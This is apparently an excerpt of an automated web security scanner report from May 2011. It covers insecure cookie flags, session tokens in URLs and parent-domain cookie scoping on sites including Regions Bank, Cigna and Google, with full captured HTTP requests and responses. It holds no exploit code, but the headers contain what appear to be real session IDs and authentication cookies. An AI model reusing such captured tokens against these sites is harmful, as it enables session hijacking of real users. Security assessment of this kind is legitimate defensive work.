GET /virtualMedia/img3094.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 19053
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 12:26:29 GMT
Accept-Ranges: bytes
ETag: "f09e7aaa686cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......7......Adobe.d....................
...
.    ..    ..................................##########...............#################################################...........
...[SNIP]...

5.89. https://www.regions.com/virtualMedia/img3107.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3107.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3107.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 6714
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 19:47:10 GMT
Accept-Ranges: bytes
ETag: "a0d87c3aa66cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...

5.90. https://www.regions.com/virtualMedia/img3108.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3108.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img3108.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118; ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Content-Length: 6824
Content-Type: image/jpeg
Last-Modified: Fri, 29 Apr 2011 19:47:23 GMT
Accept-Ranges: bytes
ETag: "60eb1a42a66cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:16:23 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...

5.91. https://www.regions.com/virtualMedia/img3132.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img3132.jpg

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img3132.jpg HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.regions.com/
Cookie: WWW.REGIONS.COM-HTTP=R3434604483; WWW.REGIONS.COM-HTTPS=R1834289105; www.regions.com-ssl=R1791168303; ASP.NET_SessionId=prjeew45fg1xsv45qmqd1255

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R1834289105; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 7184
Content-Type: image/jpeg
Last-Modified: Wed, 04 May 2011 18:55:25 GMT
Accept-Ranges: bytes
ETag: "80abd2d38cacc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:42:05 GMT

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''......x....
...[SNIP]...

5.92. https://www.regions.com/virtualMedia/img506.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img506.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /virtualMedia/img506.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=xjtyx3551jnl3uif034d0255; aspnetForm=OnlineID:%27#toggleboxid:on; WWW.REGIONS.COM-HTTP=R825062118; WT_FPC=id=2fc78c79fedd795ea741305555382886:lv=1305555468317:ss=1305555382886; WWW.REGIONS.COM-HTTPS=R492750743

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R492750743; path=/
Set-Cookie: www.regions.com-ssl=R1791168303; path=/
Content-Length: 4606
Content-Type: image/gif
Last-Modified: Wed, 26 Sep 2007 18:49:52 GMT
Accept-Ranges: bytes
ETag: "5032cc56e0c81:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:09 GMT

GIF89a..<.........(...f..T..........Ir.&..K............Y........T...................y..i................................W...........`.............................................[........O..........    .
...[SNIP]...

6. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


6.1. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.placelocal.com%2F&callback=_xdc_._4yo50g&token=45097 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 16 May 2011 16:15:36 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 37

_xdc_._4yo50g && _xdc_._4yo50g( [1] )

6.2. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/ViewportInfoService.GetViewportInfo?1m6&1m2&1d42.298510953956395&2d-71.34532860534671&2m2&1d42.41876265372929&2d-70.76803139465335&2u13&4sen-US&5e0&callback=_xdc_._7hwynl&token=51217 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Mon, 16 May 2011 16:15:39 GMT
Server: mafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2789

_xdc_._7hwynl && _xdc_._7hwynl( ["Map data ..2011 Google",[["street_view",[[42.40723466155187,-71.3671875],[42.42345651793831,-70.9716796875]]],["street_view",[[42.40723466155187,-70.94970703125],[42.
...[SNIP]...

6.3. http://mt1.googleapis.com/mapslt/ft  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mt1.googleapis.com
Path:   /mapslt/ft

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mapslt/ft?hl=en-US&lyrs=m%7Cs.t%3A33%7Cp.v%3Aoff%7Cos%3A361922046&las=twtuwwuvuvwtu,twtuwwuvuvwtw,twtuwwuvuvwut,twtuwwuvuvwuv,twtuwwuvuvwvu,twtuwwuvuvwvw,twtuwwuvuvwwt,twtuwwuvuvwwv,twtuwwuvwtutu,twtuwwuvwtutw,twtuwwuvwtuut,twtuwwuvwtuuv&z=13&src=apiv3&xc=1&apistyle=s.t:33|p.v:off&callback=_xdc_._ap21jg&token=99274 HTTP/1.1
Host: mt1.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:15:41 GMT
Expires: Mon, 16 May 2011 16:15:41 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Server: maptiles-versatile
X-XSS-Protection: 1; mode=block
Content-Length: 585

_xdc_._ap21jg && _xdc_._ap21jg([{id:"twtuwwuvuvwtu",zrange:[13,13],layer:"m"},{id:"twtuwwuvuvwtw",zrange:[13,13],layer:"m"},{id:"twtuwwuvuvwut",zrange:[13,13],layer:"m"},{id:"twtuwwuvuvwuv",zrange:[13
...[SNIP]...

7. Cookie scoped to parent domain  previous  next
There are 21 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


7.1. http://www.placelocal.com/forgot_password.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.placelocal.com
Path:   /forgot_password.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgot_password.php HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/company.php

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 15:19:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Set-Cookie: PHPSESSID=3oik1g2sp46e2tucskv23ggv70; expires=Thu, 03-Oct-2052 06:39:20 GMT; path=/; domain=.placelocal.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 15:19:39 GMT
Vary: Accept-Encoding
Content-Length: 6267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

7.2. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4dd159eaa044675c&callback=_ate.ad.hrr&pub=xa-4cd989666c0edf81&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.xsnet.com%2F&11g3bcg HTTP/1.1
Host: cf.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=2; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1305283016.60|1305283016.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Mon, 16 May 2011 17:08:13 GMT
Set-Cookie: di=1305283016.1FE|1305283016.60; Domain=.addthis.com; Expires=Wed, 15-May-2013 17:08:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15-Jun-2011 17:08:13 GMT; Path=/
Content-Type: text/javascript
Content-Length: 161
Date: Mon, 16 May 2011 17:08:12 GMT
Connection: close

_ate.ad.hrr({"urls":["http://p.addthis.com/pixel?pixelID=57148&partnerID=115&key=segment"],"segments":["1NE"],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

7.3. http://id.google.com/verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif HTTP/1.1
Host: id.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=paperg&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: SNID=47=IcQivqrsQQyyODzSZ3jSjP-k_5NKyAJcx7JYMTwH=eIcQYTf9W4Lifywd; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=KItN1BTtwQNNlX1ALe1vDC7hoepoKX2UQICiquxtJyGvPpXkRhOP0VSYRncKH-Ip7WUjGpM92yvv3kjAfNGRUaBZTHmZpQy4UvWTLU1BWRwGdARXc--dGj_5qPLGEDEK

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=47=9MV86JLCC9GhPUGzFymZgXLFqBtY6r3FawvJxe4h=3m4WhDM2VDf0DHRF; expires=Tue, 15-Nov-2011 16:24:02 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 16 May 2011 16:24:02 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

7.4. http://id.google.com/verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=flyerboard+code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=47=rmeNxjSpRiyowfuoPnPrfvCYPboGatm2egPZvsyJ6Q=PgdRYtYWovfexK6y; PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=47=Lhm6ttn7an2-iBnzwND2ChEHpa2gcQrA0oxhn4qPKMBja0y3M9EooPWTFGVZE1WGhC0EeQbdhjodIci27iUTt4FJdl_w1CKKGajsRgpNHjVx0TFdmc2yQbpHgH6J9Zjt

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=47=GlnzvSoFIw0VYMuzw1RX2G3KdegCONCncSo6MH7FlQ=vlCmjtwI5b9-3KjA; expires=Tue, 15-Nov-2011 14:45:16 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Mon, 16 May 2011 14:45:16 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

7.5. https://my.cigna.com/web/public/forgotid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/forgotid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotid HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 18768
ibm-web2-location: /web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:24 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000swQewqb5KeLPS3KgAvdAzSA:15ngp48pp; Path=/
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 18773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

7.6. https://my.cigna.com/web/public/forgotpassword  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/forgotpassword

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotpassword HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 12125
ibm-web2-location: /web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:28 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000xdcAV8q-uIGQr0Dq1DrPDth:15ngp45tc; Path=/
Set-Cookie: PD_STATEFUL_d1425c42-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 12130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

7.7. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: http://www.mycigna.com/
Cache-Control: max-age=0
Origin: http://www.mycigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:21 GMT
Set-Cookie: TLTSID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:21 GMT
Set-Cookie: PD_STATEFUL_ccb88d86-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

7.8. https://secure.regionsmortgage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.regionsmortgage.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.regionsmortgage.com
Connection: keep-alive
Accept: */*
